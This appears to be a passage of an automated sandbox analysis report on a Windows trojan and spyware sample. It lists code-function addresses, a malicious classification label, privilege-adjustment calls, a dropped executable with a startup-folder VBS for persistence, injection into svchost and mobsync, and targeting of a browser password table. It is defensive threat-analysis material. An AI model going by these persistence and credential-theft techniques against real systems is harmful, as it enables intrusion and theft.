                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C06F9E5_2_00C06F9E
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C030305_2_00C03030
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1F1D95_2_00C1F1D9
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C131875_2_00C13187
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF12875_2_00BF1287
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C114845_2_00C11484
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C055205_2_00C05520
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C176965_2_00C17696
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C057605_2_00C05760
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C119785_2_00C11978
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C29AB55_2_00C29AB5
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C77DDB5_2_00C77DDB
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C11D905_2_00C11D90
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C1BDA65_2_00C1BDA6
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C03FE05_2_00C03FE0
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BFDF005_2_00BFDF00
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_022836705_2_02283670
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000FE6A07_2_000FE6A0
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011D9757_2_0011D975
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000FFCE07_2_000FFCE0
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001121C57_2_001121C5
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001262D27_2_001262D2
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001703DA7_2_001703DA
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0012242E7_2_0012242E
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001125FA7_2_001125FA
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0014E6167_2_0014E616
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001066E17_2_001066E1
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0012878F7_2_0012878F
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001088087_2_00108808
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001708577_2_00170857
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001268447_2_00126844
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001588897_2_00158889
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011CB217_2_0011CB21
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00126DB67_2_00126DB6
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00106F9E7_2_00106F9E
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001030307_2_00103030
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001131877_2_00113187
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011F1D97_2_0011F1D9
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000F12877_2_000F1287
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001114847_2_00111484
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001055207_2_00105520
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001176967_2_00117696
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001057607_2_00105760
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001119787_2_00111978
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00129AB57_2_00129AB5
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00111D907_2_00111D90
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_0011BDA67_2_0011BDA6
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00177DDB7_2_00177DDB
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_000FDF007_2_000FDF00
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_00103FE07_2_00103FE0
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_02EA36707_2_02EA3670
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004185839_2_00418583
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004100339_2_00410033
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040E0B39_2_0040E0B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040290C9_2_0040290C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004029109_2_00402910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004011D09_2_004011D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004032409_2_00403240
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040E28B9_2_0040E28B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042EC339_2_0042EC33
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401CE09_2_00401CE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004045E49_2_004045E4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040259B9_2_0040259B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00402D9D9_2_00402D9D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00402DA09_2_00402DA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004025A09_2_004025A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401E739_2_00401E73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040FE0A9_2_0040FE0A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040FE139_2_0040FE13
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004167C39_2_004167C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004167BF9_2_004167BF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FA3529_2_033FA352
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034003E69_2_034003E6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334E3F09_2_0334E3F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E02749_2_033E0274
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C02C09_2_033C02C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DA1189_2_033DA118
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033301009_2_03330100
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033C81589_2_033C8158
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F41A29_2_033F41A2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034001AA9_2_034001AA
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F81CC9_2_033F81CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D20009_2_033D2000
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033407709_2_03340770
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033647509_2_03364750
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333C7C09_2_0333C7C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335C6E09_2_0335C6E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033405359_2_03340535
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034005919_2_03400591
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E44209_2_033E4420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F24469_2_033F2446
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EE4F69_2_033EE4F6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FAB409_2_033FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F6BD79_2_033F6BD7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333EA809_2_0333EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033569629_2_03356962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033429A09_2_033429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340A9A69_2_0340A9A6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334A8409_2_0334A840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033428409_2_03342840
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033268B89_2_033268B8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0336E8F09_2_0336E8F0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03360F309_2_03360F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E2F309_2_033E2F30
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03382F289_2_03382F28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B4F409_2_033B4F40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033BEFA09_2_033BEFA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334CFE09_2_0334CFE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03332FC89_2_03332FC8
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FEE269_2_033FEE26
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340E599_2_03340E59
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03352E909_2_03352E90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FCE939_2_033FCE93
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FEEDB9_2_033FEEDB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DCD1F9_2_033DCD1F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334AD009_2_0334AD00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03358DBF9_2_03358DBF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0333ADE09_2_0333ADE0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03340C009_2_03340C00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E0CB59_2_033E0CB5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03330CF29_2_03330CF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F132D9_2_033F132D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332D34C9_2_0332D34C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0338739A9_2_0338739A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033452A09_2_033452A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E12ED9_2_033E12ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335B2C09_2_0335B2C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0340B16B9_2_0340B16B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0332F1729_2_0332F172
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337516C9_2_0337516C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0334B1B09_2_0334B1B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F70E99_2_033F70E9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF0E09_2_033FF0E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EF0CC9_2_033EF0CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033470C09_2_033470C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF7B09_2_033FF7B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033856309_2_03385630
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F16CC9_2_033F16CC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F75719_2_033F7571
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_034095C39_2_034095C3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DD5B09_2_033DD5B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FF43F9_2_033FF43F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033314609_2_03331460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFB769_2_033FFB76
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335FB809_2_0335FB80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B5BF09_2_033B5BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0337DBF99_2_0337DBF9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B3A6C9_2_033B3A6C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFA499_2_033FFA49
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F7A469_2_033F7A46
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033DDAAC9_2_033DDAAC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03385AA09_2_03385AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033E1AA39_2_033E1AA3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033EDAC69_2_033EDAC6
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033D59109_2_033D5910
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033499509_2_03349950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335B9509_2_0335B950
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033AD8009_2_033AD800
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033438E09_2_033438E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFF099_2_033FFF09
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFFB19_2_033FFFB1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03341F929_2_03341F92
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03303FD29_2_03303FD2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03303FD59_2_03303FD5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03349EB09_2_03349EB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F7D739_2_033F7D73
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033F1D5A9_2_033F1D5A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03343D409_2_03343D40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0335FDC09_2_0335FDC0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033B9C329_2_033B9C32
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_033FFCF29_2_033FFCF2
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 277 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 111 times
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: String function: 000F7DE1 appears 35 times
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: String function: 00118900 appears 42 times
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: String function: 00110AE3 appears 70 times
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: String function: 00C10AE3 appears 70 times
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: String function: 00BF7DE1 appears 35 times
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: String function: 00C18900 appears 42 times
                    Source: 25Lz840Dmh.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/11@4/2
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5A06A GetLastError,FormatMessageW,5_2_00C5A06A
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C481CB AdjustTokenPrivileges,CloseHandle,5_2_00C481CB
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_00C487E1
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001481CB AdjustTokenPrivileges,CloseHandle,7_2_001481CB
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeCode function: 7_2_001487E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,7_2_001487E1
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_00C5B3FB
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C6EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_00C6EE0D
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00C5C397 CoInitialize,CoCreateInstance,CoUninitialize,5_2_00C5C397
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeCode function: 5_2_00BF4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,5_2_00BF4E89
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeFile created: C:\Users\user\AppData\Local\DalymoreJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeFile created: C:\Users\user~1\AppData\Local\Temp\autE43B.tmpJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
                    Source: 25Lz840Dmh.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: mobsync.exe, 0000000F.00000002.2540011755.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2540011755.0000000003189000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2071881069.0000000003167000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.2540011755.0000000003193000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2073584338.0000000003189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 25Lz840Dmh.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeFile read: C:\Users\user\Desktop\25Lz840Dmh.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\25Lz840Dmh.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fricandeaus.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe"
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\25Lz840Dmh.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Dalymore\fricandeaus.exe" Jump to behavior
                    Source: C:\Program Files (x86)\MdbClifQVuMvJVlKjEWqVMtLcjrbmFsogZPNwUycaiAetXElcEpaEpQYLfkSTTpHXocTeiLi\LHSqcaLVnKQk.exeProcess created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mobsync.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\25Lz840Dmh.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Dalymore\fricandeaus.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
